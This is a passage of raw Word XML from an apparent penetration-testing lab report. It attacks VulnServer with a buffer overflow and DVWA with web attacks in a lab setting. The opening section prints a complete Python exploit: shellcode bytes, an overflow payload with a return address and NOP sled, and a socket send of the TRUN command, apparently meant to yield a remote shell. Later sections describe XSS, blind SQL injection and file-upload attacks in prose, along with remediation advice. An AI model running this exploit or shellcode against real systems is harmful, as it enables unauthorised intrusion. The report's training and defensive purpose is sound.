    <w:p w14:paraId="23C92EE8" w14:textId="77777777" w:rsidR="00E905A9" w:rsidRPr="009D1C93" w:rsidRDefault="00E905A9" w:rsidP="00E905A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E905A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sending the Final Payload to Trigger the Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1C93">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E81E00"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#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD3898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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F6A8A"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import struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B70507"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p>
    <w:p w14:paraId="5087E998"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p>
    <w:p w14:paraId="09194816"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF1BA2"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b"\xdb\xc4\xd9\x74\x24\xf4\x5f\xb8\xed\xfc\x7a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503CCB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b"\xc6\x29\xc9\xb1\x52\x31\x47\x17\x83\xc7\x04"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD0C75F"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b"\x03\xaa\xef\x98\x33\xc8\xf8\xdf\xbc\x30\xf9"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D40E9"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b"\xbf\x35\xd5\xc8\xff\x22\x9e\x7b\x30\x20\xf2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692FE35D"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b"\x77\xbb\x64\xe6\x0c\xc9\xa0\x09\xa4\x64\x97"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3253E1"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b"\x24\x35\xd4\xeb\x27\xb5\x27\x38\x87\x84\xe7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8CA8F"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b"\x4d\xc6\xc1\x1a\xbf\x9a\x9a\x51\x12\x0a\xae"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380FB87A"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b"\x2c\xaf\xa1\xfc\xa1\xb7\x56\xb4\xc0\x96\xc9"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24E2B5"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b"\xce\x9a\x38\xe8\x03\x97\x70\xf2\x40\x92\xcb"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781A110B"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b"\x89\xb3\x68\xca\x5b\x8a\x91\x61\xa2\x22\x60"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0CC44A"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b"\x7b\xe3\x85\x9b\x0e\x1d\xf6\x26\x09\xda\x84"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D316EF"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b"\xfc\x9c\xf8\x2f\x76\x06\x24\xd1\x5b\xd1\xaf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423B6AC"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b"\xdd\x10\x95\xf7\xc1\xa7\x7a\x8c\xfe\x2c\x7d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923DB3F"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b"\x42\x77\x76\x5a\x46\xd3\x2c\xc3\xdf\xb9\x83"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9ED5E7"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lastRenderedPageBreak/>
        <w:t>shellcode += b"\xfc\x3f\x62\x7b\x59\x34\x8f\x68\xd0\x17\xd8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80ECD7"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b"\x5d\xd9\xa7\x18\xca\x6a\xd4\x2a\x55\xc1\x72"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AB990"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b"\x07\x1e\xcf\x85\x68\x35\xb7\x19\x97\xb6\xc8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DB1C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b"\x30\x5c\xe2\x98\x2a\x75\x8b\x72\xaa\x7a\x5e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1967C5"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b"\xd4\xfa\xd4\x31\x95\xaa\x94\xe1\x7d\xa0\x1a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AED9FD"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b"\xdd\x9e\xcb\xf0\x76\x34\x36\x93\xb8\x61\x3a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EDAE8D"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b"\xe3\x51\x70\x3a\xfc\x31\xfd\xdc\x68\x22\xa8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474E49F0"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b"\x77\x05\xdb\xf1\x03\xb4\x24\x2c\x6e\xf6\xaf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177598D"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b"\xc3\x8f\xb9\x47\xa9\x83\x2e\xa8\xe4\xf9\xf9"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB33622"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b"\xb7\xd2\x95\x66\x25\xb9\x65\xe0\x56\x16\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830B43B"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b"\xa5\xa9\x6f\xd6\x5b\x93\xd9\xc4\xa1\x45\x21"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7F1B45"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b"\x4c\x7e\xb6\xac\x4d\xf3\x82\x8a\x5d\xcd\x0b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A45E5C2"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b"\x97\x09\x81\x5d\x41\xe7\x67\x34\x23\x51\x3e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C0617"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b"\xeb\xed\x35\xc7\xc7\x2d\x43\xc8\x0d\xd8\xab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D26630"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b"\x79\xf8\x9d\xd4\xb6\x6c\x2a\xad\xaa\x0c\xd5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7245D"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b"\x64\x6f\x3c\x9c\x24\xc6\xd5\x79\xbd\x5a\xb8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AF75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b"\x79\x68\x98\xc5\xf9\x98\x61\x32\xe1\xe9\x64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F0870"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shellcode += b"\x7e\xa5\x02\x15\xef\x40\x24\x8a\x10\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D39000"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p>
    <w:p w14:paraId="63480546"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p>
    <w:p w14:paraId="5CFF2DE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payload = 'A' * 2006 + struct.pack("&lt;L",0x625011AF) + '\x90' * 16 + shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4490470A"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p>
    <w:p w14:paraId="6E0221D9"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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D96C27"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print "\nSending tons of random bytes..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A170AC7"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s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710562BC"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connect=s.connect(('192.168.2.1',9999))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9BC75"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s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AFBF9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s.send(('TRUN .' + payload + '\r\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395559F9"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s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A696AB2"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s.send('EXIT\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592EDBD8"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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4DB9C"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 xml:space="preserve">    print "\nDone! Wonder if we got that shell back?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3659F053" w14:textId="77777777" w:rsidR="00B5040C" w:rsidRPr="00B5040C"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B5040C">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6CEF1" w14:textId="56539EF6" w:rsidR="00E905A9" w:rsidRDefault="00B5040C" w:rsidP="00B5040C">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tl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5040C">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">    print "Could not connect to 9999 for some reason..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FF3CA9" w14:textId="5E0DF030" w:rsidR="00B36AE6" w:rsidRDefault="00B5040C" w:rsidP="00B36AE6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1C93">
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B335F5F" w14:textId="4C718C72" w:rsidR="00B5040C" w:rsidRDefault="00B5040C" w:rsidP="00B5040C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B5040C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B25CE8D" wp14:editId="3471C899">
            <wp:extent cx="4810796" cy="2181529"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="79095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52967" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4810796" cy="2181529"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E229CD" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="00B36AE6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC70B4A" w14:textId="5B317F01" w:rsidR="00B36AE6" w:rsidRPr="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00B36AE6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36AE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1.4 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7209054C" w14:textId="77777777" w:rsidR="00B36AE6" w:rsidRDefault="00B36AE6" w:rsidP="00B36AE6"/>
    <w:p w14:paraId="24910BF7" w14:textId="77777777" w:rsidR="0087020B" w:rsidRDefault="0087020B" w:rsidP="0087020B"/>
    <w:p w14:paraId="6B84BE5F" w14:textId="77777777" w:rsidR="0087020B" w:rsidRPr="0087020B" w:rsidRDefault="0087020B"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87020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The following steps are what we advise doing to fix the buffer overflow problem in VulnServer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8832D4" w14:textId="77777777" w:rsidR="0087020B" w:rsidRPr="0087020B" w:rsidRDefault="0087020B"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2A12D3A5" w14:textId="77777777" w:rsidR="0087020B" w:rsidRPr="0087020B" w:rsidRDefault="0087020B"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87020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1. Implement strict input validation processes to ensure that data given by users doesn't exceed the allocated buffer space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E389C" w14:textId="77777777" w:rsidR="0087020B" w:rsidRPr="0087020B" w:rsidRDefault="0087020B"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87020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2. Use safe string operations and bounds checking in your secure code to prevent buffer overflow vulnerabilities in software applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22791F01" w14:textId="66DE8014" w:rsidR="002B6036" w:rsidRDefault="0087020B"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87020B">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3. Regularly update and patch vulnerable software to address known security vulnerabilities such as buffer overflows and memory corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489BE4D5" w14:textId="77777777" w:rsidR="0087020B" w:rsidRDefault="0087020B"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5445770B" w14:textId="77777777" w:rsidR="0087020B" w:rsidRDefault="0087020B"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166FE0AB"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7E878707"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23036473"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03076E1B"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5AFFE9CA"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19AE4BFC"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48333F9B"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5BD65C97"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413AD478"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583C24AC"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3D8B2760"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2799D6CA"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3399B6F8" w14:textId="77777777" w:rsidR="00E90321" w:rsidRDefault="00E90321"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2B313527" w14:textId="77777777" w:rsidR="0087020B" w:rsidRPr="0087020B" w:rsidRDefault="0087020B" w:rsidP="0087020B">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57AD5522" w14:textId="2B0D1280" w:rsidR="006F30A3" w:rsidRDefault="002B6036" w:rsidP="00E90321">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6036">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2 Attack 2: Web Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D96F0D" w14:textId="77777777" w:rsidR="00E90321" w:rsidRPr="00E90321" w:rsidRDefault="00E90321" w:rsidP="00E90321">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152472CC" w14:textId="3B912995" w:rsidR="006F30A3" w:rsidRDefault="006F30A3" w:rsidP="00E90321">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6036">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838B682" w14:textId="77777777" w:rsidR="00E90321" w:rsidRPr="00E90321" w:rsidRDefault="00E90321" w:rsidP="00E90321">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3254C910" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRP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6F30A3">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Taking advantage of flaws in online services and apps is the goal of many tactics used in online assaults. File upload assaults, Blind SQL Injection, and Cross-Site Scripting (both DOM-based and stored) are the four types of online attacks covered in this section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B23331" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRPr="006F30A3" w:rsidRDefault="006F30A3" w:rsidP="006F30A3">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4462CA79" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRPr="006F30A3" w:rsidRDefault="006F30A3" w:rsidP="006F30A3">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657DEB7C" w14:textId="56A6DDCE" w:rsidR="006F30A3" w:rsidRDefault="006F30A3" w:rsidP="00E90321">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F30A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628C8A4" w14:textId="77777777" w:rsidR="00E90321" w:rsidRPr="00E90321" w:rsidRDefault="00E90321" w:rsidP="00E90321">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ABFF0F4" w14:textId="77777777" w:rsid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6F30A3">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To perform the Web Attacks, I used an organized methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412F1145" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRP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208B929D" w14:textId="419E43A4" w:rsidR="006F30A3" w:rsidRP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6F30A3">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1.</w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F30A3">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XSS (DOM-based and stored):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F30A3">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I found weak input fields inside the web application, wrote malicious scripts to exploit them,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and </w:t>
      </w:r>
      <w:r w:rsidRPr="006F30A3">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then injected these scripts to execute arbitrary code within the victim's browser. Screenshots were recorded at each stage to document the </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">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exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="006F30A3">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process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25845FF0" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRP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626137ED" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRP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6F30A3">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2. Blind SQL Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F30A3">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I attempted to get sensitive information from the backend database by changing the web application's SQL queries using Boolean and time-based approaches. Screenshots were acquired to demonstrate the efficient extraction of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AB72B6" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRP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3A5C945F" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRP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6F30A3">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:t>3. File Upload Attack:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F30A3">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xml:space="preserve"> I exploited the web application's vulnerable file upload functionality to upload potentially destructive files that the server may employ. To show the successful upload and execution of the malicious file, screenshots were captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB4DBB4" w14:textId="77777777" w:rsidR="006F30A3" w:rsidRPr="006F30A3" w:rsidRDefault="006F30A3" w:rsidP="006F30A3">
      <w:pPr>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p>
    <w:p w14:paraId="0E81E799" w14:textId="2EAD693F" w:rsidR="002B6036" w:rsidRPr="00E90321" w:rsidRDefault="002B6036" w:rsidP="00E90321">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C56F60E" w14:textId="77777777" w:rsidR="007B683D" w:rsidRDefault="007B683D" w:rsidP="002B6036"/>
    <w:p w14:paraId="289E8085" w14:textId="77777777" w:rsidR="002B6036" w:rsidRPr="002B6036" w:rsidRDefault="002B6036" w:rsidP="002B6036">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6036">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2.3 Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B54109" w14:textId="77777777" w:rsidR="002B6036" w:rsidRDefault="002B6036" w:rsidP="002B6036"/>
    <w:p w14:paraId="078A43BC" w14:textId="77777777" w:rsidR="003E263D" w:rsidRPr="003E263D" w:rsidRDefault="003E263D" w:rsidP="003E263D">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pPr>
      <w:r w:rsidRPr="003E263D">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Following the Web Attacks, the following discoveries were made:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A11E98" w14:textId="10AFEAB2" w:rsidR="003E263D" w:rsidRPr="003E263D" w:rsidRDefault="003E263D" w:rsidP="003E263D">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r w:rsidRPr="003E263D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>- XSS (stored and DOM-based):</w:t>
      </w:r>
      <w:r w:rsidR="00791833">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003E263D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003E263D">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t>- The effect of Cross-Site Scripting vulnerabilities is shown by the successful execution of malicious scripts in the victim's browser.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E263D">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:br/>
        <w:t>Session cookie theft, fraudulent website redirection, and acting on behalf of authorized users are all possible.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E263D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="633C457A" w14:textId="77777777" w:rsidR="002B6036" w:rsidRDefault="002B6036" w:rsidP="002B6036">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42557D7C" w14:textId="77777777" w:rsidR="00791833" w:rsidRPr="00791833" w:rsidRDefault="00791833" w:rsidP="00791833">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bar w:val="none" w:sz="0" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791833">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Blind SQL Injection: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335B194F" w14:textId="5C921197" w:rsidR="00791833" w:rsidRPr="00791833" w:rsidRDefault="00791833" w:rsidP="00791833">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r w:rsidRPr="00791833">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">- Successful extraction of sensitive information from the backend database, including usernames, passwords, and other personal data. </w:t>
      </w:r>
      <w:r w:rsidRPr="00791833">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Demonstrated the vital need </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00791833">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> input validation and parameterized queries to avoid SQL injection attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392DD3BC" w14:textId="77777777" w:rsidR="002B6036" w:rsidRDefault="002B6036" w:rsidP="002B6036"/>
    <w:p w14:paraId="2E20ABDD" w14:textId="77777777" w:rsidR="002B6036" w:rsidRPr="00724F44" w:rsidRDefault="002B6036" w:rsidP="002B6036">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>File Upload Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1441CF50" w14:textId="42EF0A2B" w:rsidR="00791833" w:rsidRDefault="00791833" w:rsidP="00791833">
      <w:r>
        <w:t>- Successful upload and execution of malicious files on the server, possibly leading to remote code execution and complete penetration of the online application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DBA1D6" w14:textId="3206DCB2" w:rsidR="002B6036" w:rsidRDefault="00791833" w:rsidP="00791833">
      <w:r>
        <w:t xml:space="preserve">  - Highlighted the need </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:t>to provide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> effective file upload validation and security </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to avoid unauthorized file execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0179F33E" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002B6036"/>
    <w:p w14:paraId="63E6AF10" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002B6036"/>
    <w:p w14:paraId="7BDC6FFF" w14:textId="1972CB1C" w:rsidR="002B6036" w:rsidRPr="00724F44" w:rsidRDefault="002B6036" w:rsidP="002B6036">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C180FF" w14:textId="77777777" w:rsidR="002B6036" w:rsidRDefault="002B6036" w:rsidP="002B6036"/>
    <w:p w14:paraId="2DAE244A" w14:textId="23D6D401" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00174E66">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS (DOM-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4191AF07" w14:textId="77777777" w:rsidR="00174E66" w:rsidRPr="00724F44" w:rsidRDefault="00174E66" w:rsidP="00174E66">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0354C537" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cross-Site Scripting (XSS) (DOM-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E7830" w14:textId="238F0657" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA (Damn Vulnerable Web Application) running at </w:t>
      </w:r>
      <w:r w:rsidR="0023763A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>192.168.2.129</w:t>
      </w:r>
    </w:p>
